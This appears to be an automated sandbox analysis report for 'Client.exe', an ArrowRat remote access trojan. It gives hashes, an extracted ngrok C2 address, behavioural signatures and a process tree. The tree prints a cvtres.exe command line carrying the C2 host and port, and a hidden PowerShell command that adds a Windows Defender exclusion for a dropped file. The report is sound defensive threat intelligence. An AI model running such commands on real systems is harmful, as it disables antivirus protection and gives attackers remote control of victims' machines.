Overview

overview

10

Static

static

10

Client.exe

windows7-x64

10

Client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    80s
  • max time network
    81s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2023 08:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client.exe

  • Size

    158KB

  • MD5

    ae1a31fccddf3c728479e181ee16c74b

  • SHA1

    767c87adcd18546e3ae40d781579071f7f8035a2

  • SHA256

    279e15cb4ddbb440f1dbffe4f8af8430201971d59c1f40a58a12f81e4f59b342

  • SHA512

    9343ad9da7db4a6f8eb2bd78505bcce18d026de7cdc520864090b130d8d395b0edfc26c456bb4ec554cbd7473ea8cb14302b5a4e91a2072f81f219c97cc81905

  • SSDEEP

    3072:TbzmH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPP1O8Y:Tbzme0ODhTEPgnjuIJzo+PPcfPPY8

Score
10/10
arrowratclientpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

6.tcp.eu.ngrok.io:19154

Mutex

Runtime Broker

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 25 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 60 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2676
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2708
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
      2⤵
        PID:1664
      • C:\Windows\System32\ComputerDefaults.exe
        "C:\Windows\System32\ComputerDefaults.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2836
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\ThcnSsICa\XBIbIpjFB.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4768
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3644
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2468
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1516

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133292259645142116.txt
      Filesize

      75KB

      MD5

      d593ab3de06766ce8695239288cee68e

      SHA1

      7d18a2604fdabb2f4c1e43031e5cb140f5c78ab6

      SHA256

      15d22e67c9c64cf6dad43e737cafd56ca4678b4ff69724151ba2737da9d0156f

      SHA512

      6af372cd3e4bbe7ba6a64a7120c4a9b7c3bca9d81ce105611e282d99e09303ee4d51b720957e99d9d18a34506475fab25400bfc00d69b71311e1c761a316b861

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2r4ydtaq.jhc.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\temp0923
      Filesize

      10B

      MD5

      e688e3e4c2990b47bbbe5e63d3403f59

      SHA1

      e4ce1d4e3d3b9f5f003e56c2eb1fb3c84a27f626

      SHA256

      708c57b799538fb63686d4acee9f15fe511757be134354a59da570dc3093e41a

      SHA512

      e94a8396d06f26ff72be24707b67cf600c973c060cb29febaba6458d91d55733d35fe99616b6439035def0197bd54c12c821aeb818cc0325cd677dc12c9aa554

      Download Submit

    • memory/1516-351-0x000001B9141C0000-0x000001B9141C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1516-350-0x000001B9141C0000-0x000001B9141C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1516-349-0x000001B9141C0000-0x000001B9141C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1516-348-0x000001B9141C0000-0x000001B9141C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1516-347-0x000001B9141C0000-0x000001B9141C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1516-343-0x000001B9141C0000-0x000001B9141C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1516-353-0x000001B9141C0000-0x000001B9141C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1516-342-0x000001B9141C0000-0x000001B9141C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1516-341-0x000001B9141C0000-0x000001B9141C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1516-352-0x000001B9141C0000-0x000001B9141C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1664-146-0x00000000062E0000-0x0000000006330000-memory.dmp

      Filesize

      320KB

      Download

    • memory/1664-137-0x00000000052B0000-0x000000000534C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/1664-139-0x0000000005AE0000-0x0000000006084000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1664-299-0x00000000051C0000-0x00000000051D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1664-138-0x00000000051C0000-0x00000000051D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1664-134-0x0000000000400000-0x0000000000418000-memory.dmp

      Filesize

      96KB

      Download

    • memory/1664-136-0x0000000005210000-0x00000000052A2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/1664-142-0x0000000005A20000-0x0000000005A86000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2468-173-0x000001464E5C0000-0x000001464E5E0000-memory.dmp

      Filesize

      128KB

      Download

    • memory/2468-175-0x000001464E580000-0x000001464E5A0000-memory.dmp

      Filesize

      128KB

      Download

    • memory/2468-177-0x000001464E990000-0x000001464E9B0000-memory.dmp

      Filesize

      128KB

      Download

    • memory/2676-300-0x000001F7AA7E0000-0x000001F7AA7F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2676-133-0x000001F7AA440000-0x000001F7AA46E000-memory.dmp

      Filesize

      184KB

      Download

    • memory/2676-158-0x000001F7AA7E0000-0x000001F7AA7F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2708-167-0x0000000003500000-0x0000000003501000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4768-161-0x000001AD72880000-0x000001AD72890000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4768-145-0x000001AD72830000-0x000001AD72852000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4768-159-0x000001AD72880000-0x000001AD72890000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4768-160-0x000001AD72880000-0x000001AD72890000-memory.dmp

      Filesize

      64KB

      Download